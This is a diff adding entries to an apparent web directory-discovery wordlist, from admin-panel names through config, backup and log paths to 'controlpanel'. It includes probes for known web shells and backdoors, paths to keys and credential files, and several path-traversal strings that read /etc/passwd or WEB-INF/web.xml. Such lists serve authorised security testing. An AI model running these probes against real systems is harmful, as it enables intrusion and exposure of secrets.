+actuators/shutdown +actuators/trace +ad +ad_admin.%EXT% +ad_js.js ad_login ad_manage +adadmin adam.jsp +adcadmin +adclick +add +add.%EXT% add.php +addNodeListener add_admin +add_cart +add_cart.%EXT% +add_link.%EXT% add_supplier.jsp +addadmin.%EXT% +addfav +addnews +addon +addon.%EXT% +addons +addpost +addreply +address +address_book +address_book.%EXT% +addressbook +addresses +addtocart adfs/services/trust/2005/windowstransport +adjuncts/3a890183/ adm +adm-bin/ +adm.%EXT% +adm.cgi +adm.htm adm.html +adm.jsp adm.php +adm.pl +adm.py +adm.rb +adm.shtml adm/ +adm/admloginuser.%EXT% adm/admloginuser.php +adm/fckeditor +adm/index.%EXT% adm/index.html adm/index.php +adm/style/admin.css adm_auth +adm_auth.%EXT% adm_auth.php +adm_cp admin admin%20/ +admin%EXT% +admin-ANTIGO +admin-admin +admin-ajax.php +admin-area +admin-authz.xml +admin-bin +admin-cgi admin-console admin-console/ +admin-control +admin-custom admin-database admin-database.php admin-database/ @@ -2733,11 +4473,29 @@ admin-dev/autoupgrade/ admin-dev/backups/ admin-dev/export/ admin-dev/import/ +admin-footer.%EXT% +admin-functions.%EXT% +admin-header.%EXT% admin-login +admin-login.%EXT% admin-login.html admin-login.php +admin-logout.%EXT% +admin-new +admin-newcms +admin-odkazy.%EXT% +admin-old +admin-op +admin-panel +admin-pictures +admin-post.%EXT% +admin-serv admin-serv/ admin-serv/config/admpw +admin-web +admin-wjg +admin. +admin.%EXT% admin.asp admin.aspx admin.cfm @@ -2745,18 +4503,32 @@ admin.cgi admin.conf admin.conf.default admin.dat +admin.dll admin.do +admin.epc +admin.ex +admin.exe admin.htm admin.htm.php admin.html admin.html.php +admin.inc.php +admin.js admin.jsp admin.mdb +admin.mvc +admin.old admin.passwd admin.php admin.php3 admin.pl +admin.py +admin.rb +admin.shtml +admin.srf +admin.woa admin/ +admin/%3bindex/ admin/.config admin/.htaccess admin/FCKeditor @@ -2773,31 +4545,41 @@ admin/access.log admin/access.txt admin/access_log admin/account +admin/account.%EXT% admin/account.html admin/account.php admin/admin admin/admin-login +admin/admin-login.%EXT% admin/admin-login.html admin/admin-login.php +admin/admin.%EXT% admin/admin.html admin/admin.php +admin/admin/login admin/adminLogin +admin/adminLogin.%EXT% admin/adminLogin.htm admin/adminLogin.html admin/adminLogin.php admin/admin_login +admin/admin_login.%EXT% admin/admin_login.html admin/admin_login.php +admin/adminer.php admin/backup/ admin/backups/ admin/config.php admin/controlpanel +admin/controlpanel.%EXT% admin/controlpanel.htm admin/controlpanel.html admin/controlpanel.php admin/cp +admin/cp.%EXT% admin/cp.html admin/cp.php +admin/data/autosuggest admin/db/ admin/default admin/default.asp @@ -2808,6 +4590,7 @@ admin/dumper/ admin/error.log admin/error.txt admin/error_log +admin/errors.log admin/export.php admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx @@ -2823,22 +4606,33 @@ admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx admin/fckeditor/editor/filemanager/upload/php/upload.php admin/file.php admin/files.php +admin/heapdump admin/home +admin/home.%EXT% admin/home.html admin/home.php admin/includes/configure.php~ admin/index +admin/index.%EXT% admin/index.asp admin/index.html admin/index.php +admin/js/tiny_mce admin/js/tiny_mce/ +admin/js/tinymce admin/js/tinymce/ admin/log +admin/log/error.log admin/login +admin/login.%EXT% admin/login.asp +admin/login.do admin/login.htm admin/login.html +admin/login.jsp admin/login.php +admin/login.py +admin/login.rb admin/logon.jsp admin/logs/ admin/logs/access-log @@ -2848,6 +4642,7 @@ admin/logs/err.log admin/logs/error-log admin/logs/error.log admin/logs/error_log +admin/logs/errors.log admin/logs/login.txt admin/manage admin/manage.asp @@ -2866,87 +4661,370 @@ admin/phpmyadmin2/index.php admin/pma/ admin/pma/index.php admin/pol_log.txt +admin/portalcollect.php?f=http://xxx&t=js admin/private/logs +admin/release +admin/scripts/fckeditor admin/secure/logon.jsp +admin/signin admin/sqladmin/ admin/sxd/ admin/sysadmin/ +admin/tiny_mce +admin/tinymce admin/upload.php admin/uploads.php admin/user_count.txt +admin/views/ajax/autocomplete/user/a admin/web/ admin0 +admin00 +admin08 +admin09 admin1 +admin1.%EXT% admin1.htm admin1.html admin1.php admin1/ +admin12 +admin123 +admin150 admin2 +admin2.%EXT% admin2.asp admin2.html +admin2.old admin2.old/ admin2.php admin2/ +admin2/index.%EXT% admin2/index.php +admin2/login.%EXT% admin2/login.php +admin2006/ +admin2007 +admin2007/ +admin2008 +admin2008/ +admin2009 +admin2009/ +admin2010 +admin2010/ +admin2011 +admin2011/ +admin2012/ +admin2013/ +admin21 +admin256 +admin3 admin3/ +admin3388 +admin4 +admin4.nsf admin4/ +admin44cp admin4_account/ admin4_colon/ +admin5 admin5/ +admin7 +admin711 +admin750 +admin777 +admin88 +admin888 +admin99 +admin;/ +adminB +adminCalendar.%EXT% +adminED +adminFlora +adminLogin +adminLogin.%EXT% adminLogin.html adminLogin.php adminLogin/ +adminMember.%EXT% +adminPHP +adminPR24 +adminPeople.cfm +adminSettings.%EXT% +adminStatistics.%EXT% +adminTeb +adminXP admin_ admin_/ +admin_04 +admin_05 +admin_0ec +admin_1 +admin_101 +admin_19_july +admin_SigImage.%EXT% +admin_action.%EXT% +admin_actions.%EXT% +admin_address.%EXT% admin_admin +admin_admin.%EXT% +admin_ads.%EXT% +admin_advert.%EXT% +admin_album.%EXT% +admin_alldel.%EXT% admin_area admin_area.php admin_area/ admin_area/admin +admin_area/admin.%EXT% admin_area/admin.html admin_area/admin.php +admin_area/index.%EXT% admin_area/index.html admin_area/index.php admin_area/login +admin_area/login.%EXT% admin_area/login.html admin_area/login.php +admin_assist.%EXT% +admin_assist1.%EXT% +admin_assist2.%EXT% +admin_assist3.%EXT% +admin_assist4.%EXT% +admin_awards.%EXT% +admin_backend +admin_backup +admin_badword.%EXT% +admin_banner +admin_banner.%EXT% +admin_bans.%EXT% +admin_bedit.%EXT% +admin_beta +admin_bk +admin_board +admin_board.%EXT% +admin_boardset.%EXT% +admin_c +admin_cat.%EXT% +admin_catalog +admin_cd +admin_censoring.%EXT% +admin_cmgd_1 +admin_cms +admin_common +admin_comp.%EXT% +admin_compactdb.%EXT% +admin_config.%EXT% +admin_control +admin_count.%EXT% +admin_cp +admin_custom +admin_customer +admin_customers.%EXT% +admin_d +admin_data.%EXT% +admin_db +admin_default.%EXT% +admin_deletecat.%EXT% +admin_dev +admin_dev.%EXT% +admin_dir +admin_down.%EXT% +admin_edit.%EXT% +admin_edit_firm.%EXT% +admin_edit_page.%EXT% +admin_en +admin_events +admin_expired.%EXT% admin_files +admin_forums.%EXT% +admin_gespro +admin_groups.%EXT% +admin_guestbook.%EXT% +admin_help +admin_home.%EXT% +admin_images +admin_imgmod.%EXT% +admin_imob_1 +admin_imob_2 admin_index +admin_index.%EXT% admin_index.asp +admin_info.%EXT% +admin_iprev.%EXT% +admin_js +admin_ldown.%EXT% +admin_left.%EXT% +admin_links.%EXT% +admin_loader.%EXT% admin_login +admin_login.%EXT% admin_login.html admin_login.php admin_login/ admin_login/admin.asp admin_login/login.asp admin_logon +admin_logon.%EXT% admin_logon/ +admin_logout.%EXT% +admin_logs.%EXT% admin_main +admin_main.%EXT% +admin_main.txt +admin_manage +admin_media +admin_members.%EXT% +admin_menu +admin_menu.%EXT% +admin_messages.%EXT% +admin_my_avatar.png +admin_navigation +admin_netref +admin_neu +admin_new +admin_news +admin_news.%EXT% +admin_newspost.%EXT% +admin_nonssl +admin_old +admin_online +admin_options.%EXT% +admin_pages +admin_panel +admin_panel.%EXT% +admin_partner admin_pass +admin_paylog.%EXT% +admin_payment.%EXT% +admin_pc +admin_pcc +admin_pdf.%EXT% +admin_pending.%EXT% +admin_picks.%EXT% +admin_pmmaint.%EXT% +admin_pn +admin_policy.%EXT% +admin_poll.%EXT% +admin_pop_mail.%EXT% +admin_postings.%EXT% +admin_ppc +admin_pr +admin_pragma6 +admin_private +admin_process.%EXT% +admin_report +admin_reports +admin_reset.%EXT% +admin_review +admin_rotator.%EXT% +admin_rules.%EXT% +admin_save +admin_scripts +admin_search.%EXT% +admin_search_ip.%EXT% +admin_searchlog.%EXT% +admin_secure +admin_settings.%EXT% +admin_setup.%EXT% +admin_shop +admin_site +admin_sitestat.%EXT% +admin_staff +admin_store +admin_story.%EXT% +admin_stuff +admin_super +admin_sync.%EXT% +admin_tdet.%EXT% +admin_temp +admin_template.%EXT% +admin_templates +admin_test +admin_test.%EXT% +admin_tool +admin_tools admin_tools/ +admin_top.%EXT% +admin_tpl +admin_udown.%EXT% +admin_update.%EXT% +admin_user +admin_user.%EXT% +admin_userdet.%EXT% +admin_users +admin_users.%EXT% +admin_usrmgr.%EXT% +admin_util +admin_web +admin_website +admin_welcome.%EXT% +admin_wjg +admina +admina.%EXT% +adminadminer.php +adminandy +adminarea adminarea/ +adminarea/admin.%EXT% adminarea/admin.html adminarea/admin.php +adminarea/index.%EXT% adminarea/index.html adminarea/index.php +adminarea/login.%EXT% adminarea/login.html adminarea/login.php +adminbackups +adminbanners.%EXT% +adminbb +adminbecas +adminbereich +adminbeta +adminblog +adminc +adminc.%EXT% +admincatgroup.%EXT% +admincby +admincc +admincenter +admincenter.%EXT% +admincheg +adminclude +admincms +admincodes adminconsole +admincontent admincontrol +admincontrol.%EXT% admincontrol.html admincontrol.php admincontrol/ +admincontrol/login.%EXT% admincontrol/login.html admincontrol/login.php +admincp +admincp.%EXT% admincp/ +admincp/index.%EXT% admincp/index.asp admincp/index.html admincp/js/kindeditor/ admincp/login +admincp/login.%EXT% admincp/login.asp admincp/upload/ +admincpanel +admincrud +admincurrency.%EXT% +admindav.%EXT% +admindb +admindemo +admine adminedit +adminemails.%EXT% +adminer-3.4.0-en.php +adminer-3.4.0-mysql.php +adminer-3.4.0.php adminer-4.0.3-mysql.php adminer-4.0.3.php adminer-4.1.0-mysql.php @@ -2956,33 +5034,94 @@ adminer-4.2.0.php adminer.php adminer/ adminer/adminer.php +adminer/index.php adminer_coverage.ser +adminexec.%EXT% +adminfeedback +adminfeedback.%EXT% +adminfiles +adminfolder +adminforce +adminforms +adminforum +adminftp +adminfunction.%EXT% +adminfunctions.%EXT% +admingames +admingen +admingh +adminguide +adminhome +adminhome.%EXT% +adminhtml +admini +admini.%EXT% +adminibator +adminindex.%EXT% +admininistration +admininitems.%EXT% +admininterface +adminis adminis.php +adminisrator +administ +administation +administator +administer administer/ administr8 +administr8.%EXT% administr8.php administr8/ +administra +administracao +administracao.%EXT% administracao.php +administrace +administracija +administracio +administracion +administracion.%EXT% administracion.php administracion/ +administracja +administrador administrador/ +administraotr +administrar +administrare +administrasjon +administrate +administrateur +administrateur.%EXT% administrateur.php administrateur/ +administratie administratie/ administration +administration.%EXT% administration.php administration/ administration/Sym.php +administrative administrative/ administrative/login_history +administrativo administrator administrator-login/ +administrator.%EXT% +administrator.htm administrator.html +administrator.jsp administrator.php +administrator.py +administrator.rb +administrator.shtml administrator/ administrator/.htaccess administrator/PMA/ administrator/account +administrator/account.%EXT% administrator/account.html administrator/account.php administrator/admin.asp @@ -2990,9 +5129,11 @@ administrator/admin/ administrator/cache/ administrator/db/ administrator/includes/ +administrator/index.%EXT% administrator/index.html administrator/index.php administrator/login +administrator/login.%EXT% administrator/login.asp administrator/login.html administrator/login.php @@ -3002,71 +5143,206 @@ administrator/phpMyAdmin/ administrator/phpmyadmin/ administrator/pma/ administrator/web/ +administrator2 administratoraccounts/ administratorlogin +administratorlogin.%EXT% administratorlogin.php administratorlogin/ administrators administrators.php administrators.pwd administrators/ +administratsiya +administrer +administrivia administrivia/ adminitem adminitem/ adminitems +adminitems.%EXT% adminitems.php adminitems/ +adminjsp +admink +adminka +adminka.%EXT% +adminko +adminl.%EXT% +adminlevel +adminlinks +adminlinks.%EXT% +adminlist.%EXT% +adminlistings.x +adminlocales.%EXT% adminlogin +adminlogin.%EXT% adminlogin.php +adminlogin/ +adminlogon +adminlogon.%EXT% adminlogon/ +adminm +adminm.%EXT% +adminmanager +adminmassmail.%EXT% +adminmaster +adminmember/ +adminmenu +adminmodule +adminn +adminnav.%EXT% +adminnet +adminnew +adminnews +adminnorthface +admino +adminok +adminold +adminonline +adminonly +adminopanel +adminp +adminpage +adminpages adminpanel +adminpanel.%EXT% adminpanel.html adminpanel.php adminpanel/ +adminpool +adminpp +adminprefs.%EXT% +adminpro adminpro/ +adminq +adminradii +adminreports +adminresources +adminroot admins +admins.%EXT% admins.asp admins.php admins/ admins/backup/ admins/log.txt +adminsales +adminscripts +adminserver +adminshop +adminshout +adminsite adminsite/ +adminsql +adminstaff +adminstore +adminstration +adminstuff +adminsys +adminsystem +adminsystems +admint +admintable.%EXT% +admintemplates +admintest +adminth +admintool +admintool.jsp +admintools +admintopvnet +adminui +adminus adminuser +adminusers +adminusers.%EXT% +adminv +adminv2 +adminv3 +adminweb +adminx +adminxxx +adminz +adminzone admission_controller_config.yaml +admloginuser.%EXT% admloginuser.php admpar/ admpar/.ftppass admrev/ admrev/.ftppass admrev/_files/ +adovbs.inc +ads +adsamples/ +adv.%EXT% +advadmin +advanced +advanced_search +advanced_search.%EXT% +advancedsearch.%EXT% +advertise +advertising +adview +advisories +advsearch.%EXT% ae3e4a01510afef2b72758a070230889f2279cb0.jsp af1bfebf-d12f-47b3-b3ef-37246e667eda.jsp af5771b6fad74623eb9d85fc8f865c3dd5712330.jsp +afadmin +affadmin affiliate +affiliate.%EXT% affiliate.php +affiliate_admin +affiliate_terms.%EXT% +affiliates affiliates.sql +agadmin agagjk.jsp +agent_admin +aiadmin +aims/ps/ +ainstall +airflow.cfg +ajax +ajax.php +ajfhasdfgsagfakjhgd ak47.php akeeba.backend.log +albums +alert +all all/ all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf +alm_admin +alps +alps/profile +altair amad.php amministratore.php analog.html +analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd anchor/errors.log +anews_admin +ansible.cfg ansible/ answers/ answers/error_log +apache apache/ apache/logs/access.log apache/logs/access_log apache/logs/error.log apache/logs/error_log +apadminred +apadminred.html apc-nrp.php apc.php apc/ apc/apc.php apc/index.php +aphtpasswd.html api api-doc api-docs @@ -3075,29 +5351,71 @@ api.php api.py api/ api/2/explore/ +api/2/issue/createmeta +api/__swagger__/ +api/_swagger_/ +api/api +api/api-docs +api/apidocs +api/apidocs/swagger.json +api/application.wadl +api/batch +api/cask/graphql +api/config +api/docs +api/docs/ api/error_log +api/index.html api/jsonws +api/jsonws/invoke api/login.json api/package_search/v4/documentation +api/profile +api/proxy +api/snapshots +api/spec/swagger.json api/swagger api/swagger-ui.html +api/swagger.json +api/swagger.yaml api/swagger.yml +api/swagger/index.html +api/swagger/static/index.html +api/swagger/swagger +api/swagger/ui/index +api/timelion/run api/v1 +api/v1/ +api/v1/swagger.json +api/v1/swagger.yaml api/v2 +api/v2/ +api/v2/helpdesk/discover +api/v2/swagger.json +api/v2/swagger.yaml api/v3 +api/v4 +api/vendor/phpunit/phpunit/phpunit +api/version +api/whoami api_log.txt apibuild.pyc apidoc apidocs +apis apiserver-aggregator-ca.cert apiserver-aggregator.cert apiserver-aggregator.key apiserver-client.crt apiserver-key.pem +app +app-admin app-service.yaml +app.%EXT% app.config app.js app.php +app.py app.yaml app/ app/.htaccess @@ -3136,6 +5454,7 @@ app/etc/local.xml.phpunit app/etc/local.xml.template app/etc/local.xml.vmachine app/etc/local.xml.vmachine.rm +app/kibana/ app/languages app/log/ app/logs/ @@ -3149,28 +5468,42 @@ app/unschedule.bat app/vendor app/vendor- app/vendor-src +app_admin +app_code +app_code.%EXT% +app_data +app_data.%EXT% app_dev.php +appadmin appcache.manifest appengine-generated/ appinc.jsp +apple applet application application.log +application.properties application.wadl +application.wadl?detail=true application/ application/cache/ application/configs/application.ini application/logs/ +applications apply.cgi applyFile.jsp +apps apps/ apps/__pycache__/ apps/frontend/config/app.yml apps/frontend/config/databases.yml +apps/vendor/phpunit/phpunit/phpunit appveyor.yml ar-lib archaius archaius.json +archive +archive.%EXT% archive.7z archive.rar archive.sql @@ -3178,49 +5511,102 @@ archive.tar archive.tar.gz archive.tgz archive.zip +archiver +archives +archi~1/ +arrow +art +article +article.%EXT% article/ article/admin article/admin/admin.asp +articles artifactory/ artifacts/ +artikeladmin +as-admin asd.jsp +asdf.php asp.aspx +asp/ +aspnet_client aspnet_client/ +aspnet_files/ aspnet_webadmin +asps/ aspwpadmin aspxspy.aspx asset.. +assets assets/ assets/fckeditor +assets/file assets/js/fckeditor assets/npm-debug.log assets/pubspec.yaml astGo000.jsp asterisk.log asterisk/ +astroadmin +asynchPeople/ +asynchbeans/ +asynchbeans/docs/ atlassian-ide-plugin.xml +atom att.jsp +attach +attachment.%EXT% +attachmentedit.%EXT% +attachments +attachments.%EXT% +audio audit.log auditevents auditevents.json +aura auth +auth.%EXT% +auth.cgi +auth.htm +auth.html auth.inc +auth.jsp auth.php +auth.pl +auth.py +auth.rb auth.tar.gz auth.zip +auth/ +auth/adm +auth/admin +auth/login +auth/login.%EXT% +auth/logon +auth/signin auth_user_file.txt authadmin authadmin.php authadmin/ authenticate authenticate.php +authenticatedy authentication authentication.php authlog.txt +author +author.dll +author.exe +author.log authorization.config +authorization.do authorize.php authorized_keys authorizenet.log +authors +authors.pwd +authtoken authuser authuser.php auto/ @@ -3234,19 +5620,25 @@ autom4te.cache autoscan.log autoupdate/ av/ +awards aws/ awstats +awstats.%EXT% awstats.conf awstats.pl awstats/ +axis axis/ axis//happyaxis.jsp +axis1/axis1-admin/ axis2-web//HappyAxis.jsp axis2/ axis2//axis2-web/HappyAxis.jsp +axis2/axis2-admin/ axis2/axis2-web/HappyAxis.jsp azure-pipelines.yml azureadmin/ +b b0456b5fb1b3501c2732e3a64157a95109f175dd.jsp b0baca1d732c0704a7ae1ecd6d7229a4cb63222c.jsp b0bf32a5535c8815eff7429338d0111f2eef41ae.jsp @@ -3266,12 +5658,26 @@ b6eaf949b5037ce7ed2b16ed0752bc506b0664a2.jsp b783b4c5b8e4db4c6a211e6fc06c5aafbdf4e211.jsp b7e6f10e4ddb0e1b830664a289395c34979f40aa.jsp b9fab60c8f75ff5b7eb3c18731f8ab2441391549.jsp +b_admin ba39f19d1dc058fa4b3e0a500c55e1a2f3e0c706.jsp babel.config.js +bac +back +back-end/ +back-office/ +back-up +back.%EXT% back.sql back_office.php +backadmin backdoor.jsp backdoor.jsp_ +backend.%EXT% +backend/ +backend/core/info.xml +backend_dev.%EXT% +backend_dev/ +backoffice backoffice.php backoffice/ backoffice/v1/ui @@ -3291,6 +5697,7 @@ backup.tar.gz backup.tgz backup.zip backup/ +backup/vendor/phpunit/phpunit/phpunit backup0/ backup1/ backup123/ @@ -3309,30 +5716,52 @@ backups.tar.gz backups.tgz backups.zip backups/ +badmin +bak bak.jsp bak/ bak_jspx bamb/ bamboo/ +bandwidth/ +banner +banner.%EXT% banner.swf +banner/ +banner2 +banneradmin banneradmin/ +banners +banners.%EXT% +banners/ +base base/ +base/static/c base64.jspx base64.jspx.txt +basic basic_auth.csv +bb +bb-admin bb-admin/ bb-admin/admin +bb-admin/admin.%EXT% bb-admin/admin.html bb-admin/admin.php +bb-admin/index.%EXT% bb-admin/index.html bb-admin/index.php bb-admin/login +bb-admin/login.%EXT% bb-admin/login.html bb-admin/login.php bb.jsp bb.txt.jsp +bbadmin bbadmin/ +bbemail bbff3db22a3ef1a273d02fc0a5031c77d5f6a20e.jsp +bbpre bbs/ bbs/admin/login bbs/admin_index.asp @@ -3346,21 +5775,38 @@ bea_wls_cluster_internal/ bea_wls_deployment_internal/ bea_wls_deployment_internal/DeploymentService bea_wls_diagnostics/ +bea_wls_internal bea_wls_internal/ +bea_wls_internal/HTTPClntRecv +bea_wls_internal/HTTPClntSend +bea_wls_internal/WLDummyInitJVMIDs +bea_wls_internal/WebServiceServlet bea_wls_internal/a2e2gp2r2/x.jsp +bea_wls_internal/classes/ +bea_wls_internal/getior +bea_wls_internal/iiop/ClientClose +bea_wls_internal/iiop/ClientLogin +bea_wls_internal/iiop/ClientRecv +bea_wls_internal/iiop/ClientSend bea_wls_internal/psquare/x.jsp +beanManaged beans beans.json bee670efc19f12a63d9946c8550526fddcb5b0f6.jsp behat.yml +beheer/ +bel_admin +bestellvorgang.%EXT% beta bf7d2a8eede3d38f8d3c7491fed173dd746d4b55.jsp bfdc120b44527820c339fa6325421f3bdb9b903d.jsp +bgadmin bigadmin/ bigdump.php billing billing/ billing/killer.php +bin bin-debug/ bin-release/ bin/ @@ -3372,7 +5818,9 @@ bin/reset-db-prod.sh bin/reset-db.sh bin/target bin/tmp +bins/ bitbucket-pipelines.yml +bitrix bitrix/ bitrix/.settings bitrix/.settings.bak @@ -3417,36 +5865,67 @@ bitrix_server_test.php bitrixsetup.php biy/ biy/upload/ +biz_admin +biz_admin_bak +bizadmin +black/template.xml blacklist.dat blah-whatever-badfile.jsp blah-whatever.jsp +blank bld/ blib/ blockchain.json +blocks +blocks.%EXT% +blog blog/ blog/error_log +blog/fckeditor +blog/phpmyadmin/ blog/wp-content/backup-db/ blog/wp-content/backups/ blog/wp-login blog/wp-login.php +blog_admin +blogadmin blogindex/ +blogs +bluadmin +bmadmin +bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml +bnt_admin +bo0om.ru +boadmin +board +boardadmin +book bookContent.swf +books +books.%EXT% +boot-finished boot.php bootstrap/data bootstrap/tmp +borat bot.txt bower.json bower_components bower_components/ box.json +bpadmin +brokeradmin +browse browser.jsp browser/ brunch-config.coffee brunch-config.js +bsadmin bsmdashboards/messagebroker/amfsecure buck.sql buffer.conf bugs +bugs/verify.php?confirm_hash=&id=1 build build-iPhoneOS/ build-iPhoneSimulator/ @@ -3464,9 +5943,21 @@ build/reference/web-api/explore buildNumber.properties build_config_private.ini build_isolated/ +bullet +bundles/kibana.style.css +bundles/login.bundle.js +busadmin +business +businessadmin +button +buttons +buy +bvadmin +bw-admin bx_1c_import.php by Bagheera.jsp by Bagheera.jsp~ +c c-h.v2.php c100.php c188ac007a3ea8d4f145578598bf6693797b5f76.jsp @@ -3499,68 +5990,138 @@ cache cache-downloads cache/ cache/sql_error_latest.cgi +cache_html +cacheadmin cachemgr.cgi +cachemonitor cachemonitor/statistics.jsp caches +cacti +cacti/ +cadmin cadmins/ caidao.jsp caidao.jsp~ +cal calculateh2.jsp +calendar +calendar.%EXT% +callback callbackiframe.jsp +camadmin campSmsInfo.jsp campStepChange.jsp +camunda +camunda-welcome +cancel.html capistrano/ captures/ +car carddata4.jsp +careers +cart +cart.%EXT% +cartadmin cassandra/ cat.jsp cat.jspx cat.jspx~ +catalog catalog.wci +catalog_admin +catalog_admin.%EXT% +catalogadmin +catalogsearch +catalogsearch.%EXT% catbet1.jsp catbet2.jsp +categories +category +cb-admin cb68d7535631dc7c823afd6ad8e5aa838bccd374.jsp cbx-portal/ cbx-portal/js/zeroclipboard/ZeroClipboard.swf +cc cc-errors.txt cc-log.txt cc.jsp cc1bd92ef8a894c89c35da6115c996e98dd29a6b.jsp cc3205c727a134525f1d5f7f8e9f9dacf16f6419.jsp +cc_admin cca3ee71414b8c58dc3abd3bd59dbcf44a60d957.jsp +ccadmin ccb11b02170a505b496d26868fb98a785c3aac51.jsp ccbill.log +ccct-admin ccf6242dcc8dcbfde4fd317aeb99d9a627b972b9.jsp ccp14admin/ +cdadmin ce75d5685159bd905c93dd3591215d940899ad06.jsp cedc20a9fe73d669e5cf2d73f93b8bdbe7acc80f.jsp celerybeat-schedule cell.xml +cells centreon/ +cerberusweb cert/ +certcontrol/ certenroll/ +certificate certprov/ +certs/server.key certsrv/ ceshi.jsp cfexec.cfm cfg/ cfg/cpp/ +cfide/administrator/index.cfm +cgi +cgi-admin +cgi-bin cgi-bin/ +cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd cgi-bin/ViewLog.asp +cgi-bin/a1stats/a1disp.cgi cgi-bin/awstats.pl +cgi-bin/awstats/ +cgi-bin/htimage.exe?2,2 +cgi-bin/htmlscript +cgi-bin/imagemap.exe?2,2 +cgi-bin/index.html cgi-bin/logi.php cgi-bin/login cgi-bin/login.cgi +cgi-bin/login.php +cgi-bin/mt-xmlrpc.cgi +cgi-bin/mt.cgi +cgi-bin/mt/mt-xmlrpc.cgi +cgi-bin/mt/mt.cgi +cgi-bin/mt7/mt-xmlrpc.cgi +cgi-bin/mt7/mt.cgi cgi-bin/php.ini +cgi-bin/printenv cgi-bin/printenv.pl cgi-bin/test-cgi cgi-bin/test.cgi +cgi-bin2/ +cgi-dos/ +cgi-exe/ +cgi-local/ +cgi-perl/ +cgi-shl/ +cgi-sys cgi-sys/ cgi-sys/realsignup.cgi +cgi-win/ +cgi.%EXT% cgi.pl/ cgi/ +cgi/account/ cgi/common.cg cgi/common.cgi +cgibin/ +cgis/ +change change.log changeall.php changelog @@ -3568,14 +6129,19 @@ changelog.html changelog.md changelog.txt changes.txt +chat +chat.%EXT% +chatadmin check check.jsp check.php checkadmin checkadmin.php +checkapache.html checked_accounts.txt checklogin checklogin.php +checkout checkouts/ checkstyle/ checkuser @@ -3587,9 +6153,16 @@ chklogin chubb.xml ci/ cidr.txt +cimjobpostadmin circle.yml citrix/ +citrix/AccessPlatform/auth/ +citrix/AccessPlatform/auth/clientscripts/ +city.html +city_admin +cityadmin citydesk.xml +cjadmin ck.jsp ckeditor ckeditor/ @@ -3597,29 +6170,54 @@ ckeditor/ckfinder/ckfinder.html ckeditor/ckfinder/core/connector/asp/connector.asp ckeditor/ckfinder/core/connector/aspx/connector.aspx ckeditor/ckfinder/core/connector/php/connector.php +ckeditor/samples/ ckfinder/ ckfinder/ckfinder.html claroline/phpMyAdmin/index.php +class +classadmin.%EXT% +classes +classes.%EXT% classes/ classes/cookie.txt +classes/gladius/README.TXT classes_gen classic.json classic.jsonp +classifiedadmin cleanup.log +clear cli/ +click +client +client.%EXT% client.ovpn +client_admin client_secret.json client_secrets.json +clientadmin cliente/ cliente/downloads/h4xor.php +clients +clients.%EXT% clients.mdb clients.sql clients.sqlite clients.tar.gz clients.zip +clientsadmin +clocktower +cloud +cloud-config.txt cloud/ +cloudfoundryapplication +club_admin.%EXT% +cluster/cluster clusterframe.jsp +cm-admin +cmadmin cmake_install.cmake +cmd cmd-asp-5.1.asp cmd.jsp cmd.jspx @@ -3631,42 +6229,79 @@ cmdasp.aspx cmdjsp.jsp cmdjsp.jsp.txt cmdjsp.jsp~ +cms cms-admin +cms.%EXT% cms.csproj cms/ cms/Web.config cms/cms.csproj +cms/components/login.ascx +cms/design.htm +cms/themes/cp_themes/default/images/swfupload.swf +cms/themes/cp_themes/default/images/swfupload_f9.swf +cms_admin cmsadmin cmsadmin.php cmsadmin/ +cmsample/ +cmscockpit cmscockpit/ +cncat_admin cni-conf.json +cnt cnvd.jsp +code code.jsp codeception.yml codeship/ cofigrue.jsp collectd/ collectl/ +columns +com +com.ibm.ws.console.events +com.ibm.ws.console.events/runtime_messages.jsp com.tar.gz com.zip +comadmin command.php +comment +comment-admin.%EXT% +comments +common +common.%EXT% common.inc common.xml common/ common/config/api.ini common/config/db.ini +community +compadmin +company compass.rb compass/logon.jsp +compat compile compile_commands.json +component +component.%EXT% +components components/ +components/login.ascx composer.json composer.lock composer.phar composer/installed.json +concrete/config/banned_words.txt conditions conf +conf.html +conf.inc.php~ +conf.php.bak +conf.php.old +conf.php.swp +conf.swp conf/ conf/Catalina conf/catalina.policy @@ -3677,6 +6312,9 @@ conf/server.xml conf/tomcat-users.xml conf/tomcat8.conf conf/web.xml +conferences +config +config.%EXT% config.bak config.codekit config.codekit3 @@ -3697,6 +6335,7 @@ config.ini config.ini.bak config.ini.old config.ini.txt +config.js config.json config.json.cfm config.jsp @@ -3721,7 +6360,9 @@ config.php~ config.rb config.ru config.source +config.sql config.sub +config.swp config.txt config.xml config.yml @@ -3763,6 +6404,7 @@ configprops configs/ configs/conf_bdd.ini configs/conf_zepass.ini +configuration.inc.php~ configuration.ini configuration.php configuration.php.bak @@ -3773,56 +6415,134 @@ configuration.php.swp configuration.php.txt configuration.php.zip configuration.php~ +configuration.swp configuration/ +configuration~ configure +configure.php.bak configure.scan +config~ +confirmation.%EXT% conflg.php confluence/ +confluence/admin +confluence/pages/listpermissionpages.action +confluence/pages/templates/createpagetemplate.action +confluence/pages/templates/listpagetemplates.action +confluence/plugins/servlet/embedded-crowd +confluence/plugins/servlet/oauth/consumers/add +confluence/plugins/servlet/oauth/consumers/add-manually +confluence/plugins/servlet/oauth/consumers/list +confluence/plugins/servlet/oauth/service-providers/add +confluence/plugins/servlet/oauth/service-providers/list +confluence/plugins/servlet/oauth/update-consumer-info +confluence/plugins/servlet/oauth/view-consumer-info +confluence/plugins/servlet/upm +confluence/spaces/addmailaccount.action +confluence/spaces/exportspacehtml.action +confluence/spaces/exportspacexml.action +confluence/spaces/flyingpdf/flyingpdf.action +confluence/spaces/importmbox.action +confluence/spaces/importpages.action +confluence/spaces/removespace.action +confluence/spaces/spacepermissions.action +confluence/spaces/viewmailaccounts.action +conf~ conn.asp conn.jsp +connect connect.inc +connections +connections.%EXT% +console console/ console/base/config.json +console/j_security_check +console/login/LoginForm.jsp console/payments/config.json consul/ +consumer +contact +contact.%EXT% +contact_admin.%EXT% +contact_us +contact_us.%EXT% +contacts +contactus +contactus.%EXT% +content +content.%EXT% content/ content/debug.log +content_admin +contentadmin +contents +context.json contributing.md +contributor +contributor.%EXT% contributors.txt control control.php control/ +control/login +controller controller.php +controller/config +controller/registry controllers/ controlpanel +controlpanel.%EXT% 